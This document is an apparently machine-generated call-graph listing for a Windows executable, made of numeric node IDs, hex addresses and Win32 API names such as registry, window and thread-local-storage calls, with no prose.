TlsGetValue TlsGetValue 50572->51114 50574->50571 50575 468c20 50574->50575 50576 403400 4 API calls 50575->50576 50577 468c38 50576->50577 50577->50495 50579 46ace5 50578->50579 50580 46ace0 50578->50580 51200 469a80 46 API calls 50579->51200 50581 46ace3 50580->50581 51115 46a740 50580->51115 50581->50495 50583 46aced 50583->50495 50586 403400 4 API calls 50585->50586 50587 469f4a 50586->50587 51577 47dd00 50587->51577 50589 469fad 50590 469fb1 50589->50590 50591 469fca 50589->50591 51584 466800 50590->51584 50593 469fbb 50591->50593 51587 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50591->51587 50594 46a25e 50593->50594 50596 46a154 50593->50596 50597 46a0e9 50593->50597 50598 403420 4 API calls 50594->50598 50602 403494 4 API calls 50596->50602 50601 403494 4 API calls 50597->50601 50603 46a288 50598->50603 50599 469fe6 50599->50593 50600 469fee 50599->50600 50604 46af68 23 API calls 50600->50604 50605 46a0f6 50601->50605 50606 46a161 50602->50606 50603->50513 50613 469ffb 50604->50613 50607 40357c 4 API calls 50605->50607 50608 40357c 4 API calls 50606->50608 50609 46a103 50607->50609 50610 46a16e 50608->50610 50611 40357c 4 API calls 50609->50611 50612 40357c 4 API calls 50610->50612 50614 46a110 50611->50614 50615 46a17b 50612->50615 50618 46a024 SetActiveWindow 50613->50618 50619 46a03c 50613->50619 50616 40357c 4 API calls 50614->50616 50617 40357c 4 API calls 50615->50617 50620 46a11d 50616->50620 50621 46a188 50617->50621 50618->50619 51588 42f560 50619->51588 50623 466800 20 API calls 50620->50623 50622 40357c 4 API calls 50621->50622 50625 46a196 50622->50625 50624 46a12b 50623->50624 50626 40357c 4 API calls 50624->50626 50627 414b18 4 API calls 50625->50627 50629 46a134 50626->50629 50630 46a152 50627->50630 50632 40357c 4 API calls 50629->50632 51605 466b38 50630->51605 50635 46a141 50632->50635 50637 414b18 4 API calls 50635->50637 50636 46a08d 50638 46ade4 21 API calls 50636->50638 50637->50630 50639 46a0bf 50638->50639 50639->50513 50647 468c74 19 API calls 50646->50647 50648 46af80 50647->50648 50649 46afa2 50648->50649 50650 4652cc 7 API calls 50648->50650 51790 4652cc 50649->51790 50650->50649 50654 46afba 50655 46ade4 21 API calls 50654->50655 50656 46aff2 50655->50656 50657 414b18 4 API calls 50656->50657 50658 46b006 50657->50658 50659 46b012 50658->50659 50660 46b03c 50658->50660 50661 414b18 4 API calls 50659->50661 50662 46b05b 50660->50662 50663 46b085 50660->50663 50664 46b026 50661->50664 50665 414b18 4 API calls 50662->50665 50666 414b18 4 API calls 50663->50666 50667 414b18 4 API calls 50664->50667 50668 46b06f 50665->50668 50669 46b099 50666->50669 50724 46c424 48 API calls 50723->50724 50725 4830c7 50724->50725 50726 4830d0 50725->50726 52066 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50725->52066 50728 414ae8 4 API calls 50726->50728 50729 4830e0 50728->50729 50730 403450 4 API calls 50729->50730 50731 4830ed 50730->50731 51868 46c77c 50731->51868 50734 4830fd 50736 414ae8 4 API calls 50734->50736 50737 48310d 50736->50737 50738 403450 4 API calls 50737->50738 50739 48311a 50738->50739 50740 469868 SendMessageA 50739->50740 50741 483133 50740->50741 50742 483184 50741->50742 52068 479e18 23 API calls 50741->52068 51897 4241dc IsIconic 50742->51897 50746 48319f SetActiveWindow 50747 4831b4 50746->50747 51905 4824b4 50747->51905 50796->50494 50797->50479 50798->50479 50799->50479 53729 43d9c8 50800->53729 50803 494dcc 53734 431bd0 50803->53734 50804 494e52 50805 494e61 50804->50805 53767 4945c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50804->53767 50805->50495 50814 494e16 53765 49465c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50814->53765 50816 494e2a 53766 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50816->53766 50818 494e4a 50818->50495 50819->50505 50821 457f41 50820->50821 50822 457f61 50821->50822 50823 4078f4 19 API calls 50821->50823 50825 403400 4 API calls 50822->50825 50824 457f59 50823->50824 50826 457d10 24 API calls 50824->50826 50827 457f76 50825->50827 50826->50822 50827->50521 50836->50495 50862 46c4bc 50837->50862 50840 414ae8 50841 414af6 50840->50841 50842 4034e0 4 API calls 50841->50842 50843 414b03 50842->50843 50843->50539 50844->50549 50846 46661a 50845->50846 51065 4078f4 50846->51065 51108 42cccc 50854->51108 50857 451458 50858 451428 4 API calls 50857->50858 50859 451474 50858->50859 50861->50566 50863 414ae8 4 API calls 50862->50863 50864 46c4f0 50863->50864 50923 466898 50864->50923 50868 46c502 50869 46c511 50868->50869 50873 46c52a 50868->50873 50992 47efd0 42 API calls 50869->50992 50871 403420 4 API calls 50872 46b702 50871->50872 50872->50535 50872->50840 50874 46c571 50873->50874 50875 46c558 50873->50875 50876 46c5d6 50874->50876 50889 46c575 50874->50889 50993 47efd0 42 API calls 50875->50993 50995 42cb4c CharNextA 50876->50995 50879 46c5e5 50880 46c5e9 50879->50880 50884 46c602 50879->50884 50996 47efd0 42 API calls 50880->50996 50882 46c5bd 50994 47efd0 42 API calls 50882->50994 50883 46c626 50997 47efd0 42 API calls 50883->50997 50884->50883 50937 466a08 50884->50937 50889->50882 50889->50884 50892 46c63f 50945 403778 50892->50945 50897 46c666 50998 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50897->50998 50898 46c697 50956 42c8cc 50898->50956 50901 46c679 50904 451458 4 API calls 50901->50904 50906 46c686 50904->50906 50999 47efd0 42 API calls 50906->50999 50910 46c525 50910->50871 50924 4668b2 50923->50924 50926 42cbc0 6 API calls 50924->50926 50927 403450 4 API calls 50924->50927 50928 406bb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50924->50928 50929 4668fb 50924->50929 51002 42caac 50924->51002 50926->50924 50927->50924 50928->50924 50930 403420 4 API calls 50929->50930 50931 466915 50930->50931 50932 414b18 50931->50932 50933 414ae8 4 API calls 50932->50933 50934 414b3c 50933->50934 50935 403400 4 API calls 50934->50935 50936 414b6d 50935->50936 50936->50868 50938 466a12 50937->50938 50939 466a25 50938->50939 51018 42cb3c CharNextA 50938->51018 50939->50883 50941 466a38 50939->50941 50943 466a42 50941->50943 50942 466a6f 50942->50883 50942->50892 50943->50942 51019 42cb3c CharNextA 50943->51019 50946 4037aa 50945->50946 50948 40377d 50945->50948 50947 403400 4 API calls 50946->50947 50949 4037a0 50947->50949 50948->50946 50950 403791 50948->50950 50952 42c99c 50949->50952 50951 4034e0 4 API calls 50950->50951 50951->50949 50953 42c9f5 50952->50953 50954 42c9b2 50952->50954 50953->50897 50953->50898 50954->50953 51020 42cb3c CharNextA 50954->51020 51021 42c674 50956->51021 50992->50910 50993->50910 50994->50910 50995->50879 50996->50910 50997->50910 50998->50901 50999->50910 51003 403494 4 API calls 51002->51003 51004 42cabc 51003->51004 51005 403744 4 API calls 51004->51005 51009 42caf2 51004->51009 51011 42c444 IsDBCSLeadByte 51004->51011 51005->51004 51007 42cb36 51007->50924 51009->51007 51012 4037b8 51009->51012 51017 42c444 IsDBCSLeadByte 51009->51017 51011->51004 51013 403744 4 API calls 51012->51013 51014 4037c6 51013->51014 51015 4037fc 51014->51015 51016 4038a4 4 API calls 51014->51016 51015->51009 51016->51015 51017->51009 51018->50938 51019->50943 51020->50954 51024 42c67c 51021->51024 51027 42c68d 51024->51027 51025 42c6f1 51027->51025 51030 42c6ab 51027->51030 51068 407908 51065->51068 51069 407925 51068->51069 51076 4075b8 51069->51076 51072 407951 51074 4034e0 4 API calls 51072->51074 51075 407903 51074->51075 51079 4075d3 51076->51079 51077 4075e5 51077->51072 51081 4069a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51077->51081 51079->51077 51082 4076da 19 API calls 51079->51082 51083 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51079->51083 51081->51072 51082->51079 51083->51079 51109 42cbc0 6 API calls 51108->51109 51110 42ccee 51109->51110 51111 42ccf6 GetFileAttributesA 51110->51111 51112 403400 4 API calls 51111->51112 51113 42cd13 51112->51113 51113->50546 51113->50857 51114->50575 51117 46a787 51115->51117 51116 46abff 51119 46ac1a 51116->51119 51120 46ac4b 51116->51120 51117->51116 51118 46a842 51117->51118 51123 403494 4 API calls 51117->51123 51122 46a863 51118->51122 51126 46a8a4 51118->51126 51124 403494 4 API calls 51119->51124 51121 403494 4 API calls 51120->51121 51125 46ac59 51121->51125 51127 403494 4 API calls 51122->51127 51128 46a7c6 51123->51128 51129 46ac28 51124->51129 51228 46915c 12 API calls 51125->51228 51130 403400 4 API calls 51126->51130 51132 46a871 51127->51132 51133 414ae8 4 API calls 51128->51133 51227 46915c 12 API calls 51129->51227 51135 46a8a2 51130->51135 51136 414ae8 4 API calls 51132->51136 51137 46a7e7 51133->51137 51158 46a988 51135->51158 51207 469868 51135->51207 51140 46a892 51136->51140 51201 403634 51137->51201 51138 46ac36 51139 403400 4 API calls 51138->51139 51143 46ac7c 51139->51143 51145 403634 4 API calls 51140->51145 51150 403400 4 API calls 51143->51150 51144 46aa10 51148 403400 4 API calls 51144->51148 51145->51135 51152 46aa0e 51148->51152 51149 46a8c4 51153 46a902 51149->51153 51154 46a8ca 51149->51154 51155 46ac84 51150->51155 51222 469ca4 43 API calls 51152->51222 51159 403400 4 API calls 51153->51159 51156 403494 4 API calls 51154->51156 51157 403420 4 API calls 51155->51157 51161 46a8d8 51156->51161 51162 46ac91 51157->51162 51158->51144 51163 46a9cf 51158->51163 51164 46a900 51159->51164 51213 47c26c 51161->51213 51162->50581 51168 403494 4 API calls 51163->51168 51216 469b5c 51164->51216 51172 46a9dd 51168->51172 51170 46aa39 51179 46aa44 51170->51179 51180 46aa9a 51170->51180 51171 46a8f0 51174 403634 4 API calls 51171->51174 51175 414ae8 4 API calls 51172->51175 51174->51164 51176 46a9fe 51175->51176 51178 403634 4 API calls 51176->51178 51177 46a929 51183 46a934 51177->51183 51184 46a98a 51177->51184 51178->51152 51182 403494 4 API calls 51179->51182 51181 403400 4 API calls 51180->51181 51189 46aaa2 51181->51189 51185 46aa52 51182->51185 51187 403494 4 API calls 51183->51187 51186 403400 4 API calls 51184->51186 51185->51189 51193 403634 4 API calls 51185->51193 51194 46aa98 51185->51194 51186->51158 51188 46a942 51187->51188 51188->51158 51195 403634 4 API calls 51188->51195 51199 46ab4b 51189->51199 51223 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51189->51223 51191 46aac5 51191->51199 51224 494f3c 18 API calls 51191->51224 51193->51185 51194->51189 51195->51188 51197 46abec 51226 429144 SendMessageA SendMessageA 51197->51226 51225 4290f4 SendMessageA 51199->51225 51200->50583 51202 40363c 51201->51202 51203 4034bc 4 API calls 51202->51203 51204 40364f 51203->51204 51205 403450 4 API calls 51204->51205 51206 403677 51205->51206 51229 42a040 SendMessageA 51207->51229 51209 469877 51210 469897 51209->51210 51230 42a040 SendMessageA 51209->51230 51210->51149 51212 469887 51212->51149 51231 47c2b4 51213->51231 51220 469b89 51216->51220 51217 469beb 51218 403400 4 API calls 51217->51218 51219 469c00 51218->51219 51219->51177 51220->51217 51576 469ae0 43 API calls 51220->51576 51222->51170 51223->51191 51224->51199 51225->51197 51226->51116 51227->51138 51228->51138 51229->51209 51230->51212 51232 403494 4 API calls 51231->51232 51239 47c2e7 51232->51239 51233 47c3f9 51234 403420 4 API calls 51233->51234 51235 47c289 51234->51235 51235->51171 51237 403778 4 API calls 51237->51239 51239->51233 51239->51237 51242 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51239->51242 51243 47b100 51239->51243 51487 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51239->51487 51488 403800 51239->51488 51492 42c97c CharPrevA 51239->51492 51242->51239 51244 47b152 51243->51244 51245 47b130 51243->51245 51246 47b172 51244->51246 51247 47b160 51244->51247 51245->51244 51497 47a030 19 API calls 51245->51497 51250 47b1d5 51246->51250 51251 47b180 51246->51251 51248 403494 4 API calls 51247->51248 51315 47b16d 51248->51315 51263 47b1f6 51250->51263 51264 47b1e3 51250->51264 51253 47b1af 51251->51253 51254 47b189 51251->51254 51252 403400 4 API calls 51256 47baf8 51252->51256 51255 47b1c2 51253->51255 51499 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51253->51499 51257 47b19c 51254->51257 51498 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51254->51498 51261 403494 4 API calls 51255->51261 51262 403400 4 API calls 51256->51262 51259 403494 4 API calls 51257->51259 51259->51315 51261->51315 51265 47bb00 51262->51265 51267 47b217 51263->51267 51268 47b204 51263->51268 51266 403494 4 API calls 51264->51266 51265->51239 51266->51315 51270 47b267 51267->51270 51271 47b225 51267->51271 51269 403494 4 API calls 51268->51269 51269->51315 51277 47b275 51270->51277 51278 47b288 51270->51278 51272 47b241 51271->51272 51273 47b22e 51271->51273 51275 47b254 51272->51275 51500 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51272->51500 51274 403494 4 API calls 51273->51274 51274->51315 51276 403494 4 API calls 51275->51276 51276->51315 51280 403494 4 API calls 51277->51280 51281 47b296 51278->51281 51282 47b2a9 51278->51282 51280->51315 51283 403494 4 API calls 51281->51283 51284 47b2b7 51282->51284 51285 47b2ca 51282->51285 51283->51315 51286 403494 4 API calls 51284->51286 51287 47b2eb 51285->51287 51288 47b2d8 51285->51288 51286->51315 51290 47b327 51287->51290 51291 47b2f9 51287->51291 51289 403494 4 API calls 51288->51289 51289->51315 51296 47b335 51290->51296 51297 47b364 51290->51297 51292 47b315 51291->51292 51293 47b302 51291->51293 51295 47c26c 43 API calls 51292->51295 51294 403494 4 API calls 51293->51294 51294->51315 51295->51315 51298 47b351 51296->51298 51299 47b33e 51296->51299 51302 47b372 51297->51302 51303 47b3a0 51297->51303 51315->51252 51487->51239 51489 403804 51488->51489 51491 40382f 51488->51491 51490 4038a4 4 API calls 51489->51490 51490->51491 51491->51239 51492->51239 51497->51245 51498->51257 51499->51255 51500->51275 51576->51220 51578 47dd19 51577->51578 51581 47dd56 51577->51581 51609 455d0c 51578->51609 51581->50589 51583 47dd6d 51583->50589 51728 466714 51584->51728 51587->50599 51589 42f56c 51588->51589 51590 42f58f GetActiveWindow GetFocus 51589->51590 51591 41eea4 2 API calls 51590->51591 51592 42f5a6 51591->51592 51593 42f5c3 51592->51593 51594 42f5b3 RegisterClassA 51592->51594 51595 42f652 SetFocus 51593->51595 51596 42f5d1 CreateWindowExA 51593->51596 51594->51593 51598 403400 4 API calls 51595->51598 51596->51595 51597 42f604 51596->51597 51759 42427c 51597->51759 51600 42f66e 51598->51600 51604 494f3c 18 API calls 51600->51604 51601 42f62c 51602 42f634 CreateWindowExA 51601->51602 51602->51595 51603 42f64a ShowWindow 51602->51603 51603->51595 51604->50636 51765 44b514 51605->51765 51610 455d1d 51609->51610 51611 455d21 51610->51611 51612 455d2a 51610->51612 51635 455a10 51611->51635 51643 455af0 29 API calls 51612->51643 51615 455d27 51615->51581 51616 47d970 51615->51616 51621 47da6c 51616->51621 51627 47d9b0 51616->51627 51617 403420 4 API calls 51618 47db4f 51617->51618 51618->51583 51625 47dabd 51621->51625 51631 47da0f 51621->51631 51698 479630 51621->51698 51623 47c26c 43 API calls 51623->51625 51624 47c26c 43 API calls 51624->51627 51625->51621 51625->51623 51628 454100 20 API calls 51625->51628 51629 47da59 51625->51629 51626 47c26c 43 API calls 51633 47da18 51626->51633 51627->51621 51627->51624 51627->51631 51627->51633 51672 479770 51627->51672 51683 4798d4 51627->51683 51628->51625 51629->51631 51631->51617 51633->51626 51633->51627 51633->51629 51687 42c92c 51633->51687 51692 42c954 51633->51692 51697 47d67c 52 API calls 51633->51697 51644 42de1c 51635->51644 51637 455a2d 51638 455a7b 51637->51638 51647 455944 51637->51647 51638->51615 51641 455944 6 API calls 51642 455a5c RegCloseKey 51641->51642 51642->51615 51643->51615 51645 42de27 51644->51645 51646 42de2d RegOpenKeyExA 51644->51646 51645->51646 51646->51637 51652 42dd58 51647->51652 51649 403420 4 API calls 51650 4559f6 51649->51650 51650->51641 51651 45596c 51651->51649 51655 42dc00 51652->51655 51656 42dc26 RegQueryValueExA 51655->51656 51657 42dc6b 51656->51657 51662 42dc49 51656->51662 51658 403400 4 API calls 51657->51658 51660 42dd37 51658->51660 51659 42dc63 51661 403400 4 API calls 51659->51661 51660->51651 51661->51657 51662->51657 51662->51659 51663 4034e0 4 API calls 51662->51663 51664 403744 4 API calls 51662->51664 51663->51662 51665 42dca0 RegQueryValueExA 51664->51665 51665->51656 51666 42dcbc 51665->51666 51666->51657 51667 4038a4 4 API calls 51666->51667 51668 42dcfe 51667->51668 51669 42dd10 51668->51669 51671 403744 4 API calls 51668->51671 51670 403450 4 API calls 51669->51670 51670->51657 51671->51669 51673 479786 51672->51673 51674 479782 51672->51674 51675 403450 4 API calls 51673->51675 51674->51627 51676 479793 51675->51676 51677 4797b3 51676->51677 51678 479799 51676->51678 51680 479630 19 API calls 51677->51680 51679 479630 19 API calls 51678->51679 51681 4797af 51679->51681 51680->51681 51682 403400 4 API calls 51681->51682 51682->51674 51684 4798e0 51683->51684 51685 4798fb 51684->51685 51710 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51684->51710 51685->51627 51711 42c79c 51687->51711 51690 403778 4 API calls 51691 42c94e 51690->51691 51691->51633 51693 42c79c IsDBCSLeadByte 51692->51693 51694 42c964 51693->51694 51695 403778 4 API calls 51694->51695 51696 42c975 51695->51696 51696->51633 51697->51633 51699 47964b 51698->51699 51700 47970a 51699->51700 51703 47967c 51699->51703 51723 4794e4 19 API calls 51699->51723 51700->51621 51702 4796a1 51706 4796c2 51702->51706 51725 4794e4 19 API calls 51702->51725 51703->51702 51724 4794e4 19 API calls 51703->51724 51706->51700 51707 479702 51706->51707 51726 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51706->51726 51717 479368 51707->51717 51710->51685 51712 42c67c IsDBCSLeadByte 51711->51712 51713 42c7b1 51712->51713 51714 42c7fb 51713->51714 51716 42c444 IsDBCSLeadByte 51713->51716 51714->51690 51716->51713 51718 4793a3 51717->51718 51719 403450 4 API calls 51718->51719 51720 4793c8 51719->51720 51727 477a58 19 API calls 51720->51727 51722 479409 51722->51700 51723->51703 51724->51702 51725->51706 51726->51707 51727->51722 51729 403494 4 API calls 51728->51729 51730 466742 51729->51730 51745 42dbc8 51730->51745 51733 42dbc8 5 API calls 51734 466766 51733->51734 51735 466600 19 API calls 51734->51735 51736 466770 51735->51736 51737 42dbc8 5 API calls 51736->51737 51738 46677f 51737->51738 51748 466678 51738->51748 51741 42dbc8 5 API calls 51742 466798 51741->51742 51743 403400 4 API calls 51742->51743 51744 4667ad 51743->51744 51744->50593 51752 42db10 51745->51752 51749 466698 51748->51749 51750 4078f4 19 API calls 51749->51750 51751 4666e2 51750->51751 51751->51741 51753 42db30 51752->51753 51754 42dbbb 51752->51754 51753->51754 51755 4037b8 4 API calls 51753->51755 51757 403800 4 API calls 51753->51757 51758 42c444 IsDBCSLeadByte 51753->51758 51754->51733 51755->51753 51757->51753 51758->51753 51760 4242ae 51759->51760 51761 42428e GetWindowTextA 51759->51761 51763 403494 4 API calls 51760->51763 51762 4034e0 4 API calls 51761->51762 51764 4242ac 51762->51764 51763->51764 51764->51601 51768 44b38c 51765->51768 51769 44b3bf 51768->51769 51770 414ae8 4 API calls 51769->51770 51771 44b3d2 51770->51771 51772 44b3ff GetDC 51771->51772 51773 40357c 4 API calls 51771->51773 51774 41a1e8 5 API calls 51772->51774 51773->51772 51775 44b41f SelectObject 51774->51775 51776 44b430 51775->51776 51779 44b0c0 51776->51779 51780 44b0d7 51779->51780 51792 4652d7 51790->51792 51791 4653b2 51801 46708c 51791->51801 51792->51791 51795 465327 51792->51795 51813 421a1c 51792->51813 51796 465361 51795->51796 51797 46536c 51795->51797 51800 46536a 51795->51800 51798 421a1c 7 API calls 51796->51798 51799 421a1c 7 API calls 51797->51799 51798->51800 51799->51800 51800->51791 51819 4185b8 7 API calls 51800->51819 51802 4670bc 51801->51802 51803 46709d 51801->51803 51802->50654 51804 414b18 4 API calls 51803->51804 51805 4670ab 51804->51805 51806 414b18 4 API calls 51805->51806 51806->51802 51817 421a74 51813->51817 51818 421a2a 51813->51818 51814 421a59 51814->51817 51820 421d28 SetFocus GetFocus 51814->51820 51815 408cbc 5 API calls 51815->51814 51817->51795 51818->51814 51818->51815 51819->51791 51820->51817 51869 46c7a5 51868->51869 51870 46c7f2 51869->51870 51871 414ae8 4 API calls 51869->51871 51873 403420 4 API calls 51870->51873 51872 46c7bb 51871->51872 52075 466924 6 API calls 51872->52075 51875 46c89c 51873->51875 51875->50734 52067 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51875->52067 51876 46c7c3 51877 414b18 4 API calls 51876->51877 51878 46c7d1 51877->51878 51879 46c7de 51878->51879 51881 46c7f7 51878->51881 52076 47efd0 42 API calls 51879->52076 51882 46c80f 51881->51882 51883 466a08 CharNextA 51881->51883 52077 47efd0 42 API calls 51882->52077 51885 46c80b 51883->51885 51885->51882 51886 46c825 51885->51886 51887 46c841 51886->51887 51888 46c82b 51886->51888 51889 42c99c CharNextA 51887->51889 52078 47efd0 42 API calls 51888->52078 51891 46c84e 51889->51891 51891->51870 52079 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51891->52079 51893 46c865 51894 451458 4 API calls 51893->51894 51895 46c872 51894->51895 52080 47efd0 42 API calls 51895->52080 51898 4241ed SetActiveWindow 51897->51898 51902 424223 51897->51902 52081 42364c 51898->52081 51902->50746 51902->50747 51903 42420a 51903->51902 51904 42421d SetFocus 51903->51904 51904->51902 51906 482505 51905->51906 51907 4824d7 51905->51907 51909 475bd0 51906->51909 52094 494cec 18 API calls 51907->52094 52095 457d10 51909->52095 52068->50742 52075->51876 52076->51870 52077->51870 52078->51870 52079->51893 52080->51870 52090 4235f8 SystemParametersInfoA 52081->52090 52084 423665 ShowWindow 52086 423670 52084->52086 52087 423677 52084->52087 52093 423628 SystemParametersInfoA 52086->52093 52089 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52087->52089 52089->51903 52091 423616 52090->52091 52091->52084 52092 423628 SystemParametersInfoA 52091->52092 52092->52084 52093->52087 52094->51906 52096 457d3c 52095->52096 52111 457e44 52095->52111 52567 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52096->52567 52097 457e95 52100 403400 4 API calls 52097->52100 52102 457eaa 52100->52102 52101 457d44 52103 4078f4 19 API calls 52101->52103 52116 4072a8 52102->52116 52104 457db5 52103->52104 52568 457d00 20 API calls 52104->52568 52111->52097 52571 45757c 6 API calls 52111->52571 52117 403738 52116->52117 52567->52101 52571->52097 53768 431eec 53729->53768 53731 403400 4 API calls 53732 43da76 53731->53732 53732->50803 53732->50804 53733 43d9f2 53733->53731 53735 431bd6 53734->53735 53736 402648 4 API calls 53735->53736 53737 431c06 53736->53737 53738 4947f8 53737->53738 53739 4948cd 53738->53739 53743 494812 53738->53743 53745 494910 53739->53745 53741 433d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53741->53743 53743->53739 53743->53741 53744 403450 4 API calls 53743->53744 53773 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53743->53773 53774 431ca0 53743->53774 53744->53743 53746 49492c 53745->53746 53782 433d6c 53746->53782 53748 494931 53749 431ca0 4 API calls 53748->53749 53750 49493c 53749->53750 53751 43d594 53750->53751 53752 43d5c1 53751->53752 53757 43d5b3 53751->53757 53752->50814 53753 43d63d 53759 43d6f7 53753->53759 53785 447084 53753->53785 53755 43d688 53791 43dd50 53755->53791 53757->53752 53757->53753 53758 447084 4 API calls 53757->53758 53758->53757 53760 43d8fd 53759->53760 53762 43d8de 53759->53762 53809 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53759->53809 53760->53752 53811 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53760->53811 53810 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53762->53810 53765->50816 53766->50818 53767->50805 53769 403494 4 API calls 53768->53769 53772 431efb 53769->53772 53770 431f25 53770->53733 53771 403744 4 API calls 53771->53772 53772->53770 53772->53771 53773->53743 53775 431cae 53774->53775 53778 431cc0 53774->53778 53780 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53775->53780 53777 431ce2 53777->53743 53778->53777 53781 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53778->53781 53780->53778 53781->53777 53783 402648 4 API calls 53782->53783 53784 433d7b 53783->53784 53784->53748 53786 4470a3 53785->53786 53787 4470aa 53785->53787 53812 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53786->53812 53789 431ca0 4 API calls 53787->53789 53790 4470ba 53789->53790 53790->53755 53792 43dd6c 53791->53792 53798 43dd99 53791->53798 53793 402660 4 API calls 53792->53793 53792->53798 53793->53792 53794 43ddce 53794->53759 53796 43fea5 53796->53794 53797 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53797->53798 53798->53794 53798->53796 53798->53797 53800 43c938 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53800 53804 433d18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53804 53805 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53805 53806 436650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53806 53807 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53807 53808 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53808 53813 4396e0 53798->53813 53819 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53819 53820 43dc48 18 API calls 53798->53820 53821 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53798->53821 53800->53798 53804->53798 53805->53798 53806->53798 53807->53798 53808->53798 53809->53759 53810->53760 53811->53760 53812->53787 53819->53798 53820->53798 53821->53798 53825 41fb58 53826 41fb61 53825->53826 53829 41fdfc 53826->53829 53828 41fb6e 53830 41feee 53829->53830 53831 41fe13 53829->53831 53830->53828 53831->53830 53850 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53831->53850 53833 41fe49 53834 41fe73 53833->53834 53835 41fe4d 53833->53835 53860 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53834->53860 53851 41fb9c 53835->53851 53839 41fe81 53840 41fe85 53839->53840 53841 41feab 53839->53841 53843 41fb9c 10 API calls 53840->53843 53844 41fb9c 10 API calls 53841->53844 53842 41fb9c 10 API calls 53845 41fe71 53842->53845 53846 41fe97 53843->53846 53847 41febd 53844->53847 53845->53828 53848 41fb9c 10 API calls 53846->53848 53849 41fb9c 10 API calls 53847->53849 53848->53845 53849->53845 53850->53833 53852 41fbb7 53851->53852 53853 41f93c 4 API calls 53852->53853 53854 41fbcd 53852->53854 53853->53854 53861 41f93c 53854->53861 53856 41fc15 53857 41fc38 SetScrollInfo 53856->53857 53869 41fa9c 53857->53869 53860->53839 53862 4181e0 53861->53862 53863 41f959 GetWindowLongA 53862->53863 53864 41f996 53863->53864 53865 41f976 53863->53865 53881 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53864->53881 53880 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53865->53880 53868 41f982 53868->53856 53870 41faaa 53869->53870 53871 41fab2 53869->53871 53870->53842 53872 41faf1 53871->53872 53873 41fae1 53871->53873 53877 41faef 53871->53877 53883 417e48 IsWindowVisible ScrollWindow SetWindowPos 53872->53883 53882 417e48 IsWindowVisible ScrollWindow SetWindowPos 53873->53882 53874 41fb31 GetScrollPos 53874->53870 53878 41fb3c 53874->53878 53877->53874 53879 41fb4b SetScrollPos 53878->53879 53879->53870 53880->53868 53881->53868 53882->53877 53883->53877 53884 420598 53885 4205ab 53884->53885 53905 415b30 53885->53905 53887 4206f2 53888 420709 53887->53888 53912 4146d4 KiUserCallbackDispatcher 53887->53912 53892 420720 53888->53892 53913 414718 KiUserCallbackDispatcher 53888->53913 53889 420651 53910 420848 20 API calls 53889->53910 53890 4205e6 53890->53887 53890->53889 53898 420642 MulDiv 53890->53898 53895 420742 53892->53895 53914 420060 12 API calls 53892->53914 53896 42066a 53896->53887 53911 420060 12 API calls 53896->53911 53909 41a304 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53898->53909 53901 420687 53902 4206a3 MulDiv 53901->53902 53903 4206c6 53901->53903 53902->53903 53903->53887 53904 4206cf MulDiv 53903->53904 53904->53887 53906 415b42 53905->53906 53915 414470 53906->53915 53908 415b5a 53908->53890 53909->53889 53910->53896 53911->53901 53912->53888 53913->53892 53914->53895 53916 41448a 53915->53916 53919 410458 53916->53919 53918 4144a0 53918->53908 53922 40dca4 53919->53922 53921 41045e 53921->53918 53923 40dd06 53922->53923 53924 40dcb7 53922->53924 53929 40dd14 53923->53929 53927 40dd14 19 API calls 53924->53927 53928 40dce1 53927->53928 53928->53921 53930 40dd24 53929->53930 53932 40dd3a 53930->53932 53941 40e09c 53930->53941 53957 40d5e0 53930->53957 53960 40df4c 53932->53960 53935 40d5e0 5 API calls 53936 40dd42 53935->53936 53936->53935 53937 40ddae 53936->53937 53963 40db60 53936->53963 53939 40df4c 5 API calls 53937->53939 53940 40dd10 53939->53940 53940->53921 53977 40e96c 53941->53977 53943 403778 4 API calls 53945 40e0d7 53943->53945 53944 40e18d 53946 40e1b7 53944->53946 53947 40e1a8 53944->53947 53945->53943 53945->53944 54040 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 